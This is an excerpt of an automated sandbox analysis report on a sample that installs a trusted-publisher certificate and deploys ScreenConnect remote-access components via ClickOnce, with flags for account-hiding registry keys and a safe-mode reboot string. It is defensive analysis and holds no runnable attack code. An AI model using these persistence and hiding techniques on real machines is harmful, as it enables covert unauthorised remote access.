                  Source: Binary string: \??\C:\Windows\mscorlib.pdbe) source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Configuration.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: @7n.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF42A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF052000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1831637718.00000000050B2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: ?7nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdba3a source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HP+n0C:\Windows\mscorlib.pdb\ source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF05A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF432000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1832015455.00000000056C2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: System.Core.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.pdb4 source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdbt]yw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEEA8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871561986.0000000002592000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: creenConnect.Core.PDBDL33 source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.ClientService.dll.1.dr Static PE information: 0xC5B9CEDE [Wed Feb 13 13:04:30 2075 UTC]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_00621000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree, 0_2_00621000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: real checksum: 0x14df5 should be: 0x16eed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_00621BC0 push ecx; ret 0_2_00621BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3D92D2A5 pushad ; iretd 1_2_00007FFC3D92D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA5D2B5 push ds; iretd 1_2_00007FFC3DA5D42F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA47D00 push eax; retf 1_2_00007FFC3DA47D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA51D45 push 1BE95F14h; retn 000Ch 1_2_00007FFC3DA51CF2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA4A645 push esi; ret 1_2_00007FFC3DA52507
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA524B9 push esi; ret 1_2_00007FFC3DA52507
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA5A492 push ss; retf 1_2_00007FFC3DA5A494
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA4A6B8 push esi; ret 1_2_00007FFC3DA52507
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA4A6BD push esi; ret 1_2_00007FFC3DA52507
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA400BD pushad ; iretd 1_2_00007FFC3DA400C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA4842E pushad ; ret 1_2_00007FFC3DA4845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FFC3DA4845E push eax; ret 1_2_00007FFC3DA4846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFC3DA62E40 pushad ; ret 9_2_00007FFC3DA62E73
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFC3DA78071 pushad ; retf 9_2_00007FFC3DA7809D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFC3DA63FF2 pushad ; iretd 9_2_00007FFC3DA63FF3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFC3DA630B2 pushad ; iretd 9_2_00007FFC3DA630B3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFC3DA600BD pushad ; iretd 9_2_00007FFC3DA600C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFC3DA7842E pushad ; ret 9_2_00007FFC3DA7845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFC3DA7845E push eax; ret 9_2_00007FFC3DA7846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFC3DD52C95 push es; retf 9_2_00007FFC3DD52CF7
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe
                  Source: ScreenConnect.ClientService.dll.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.00000000029EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1871339597.0000000000ED0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1832015455.00000000056C2000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831463096.0000000004FC2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 1D2BD210000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 1D2D6E20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Memory allocated: BD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Memory allocated: 1A860000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Memory allocated: 28E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Memory allocated: 2AC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Memory allocated: 4AC0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 370
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 1728
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 2576
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Window / User API: threadDelayed 376
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dll
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe TID: 8092 Thread sleep time: -40000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 8160 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7672 Thread sleep time: -128800s >= -30000s
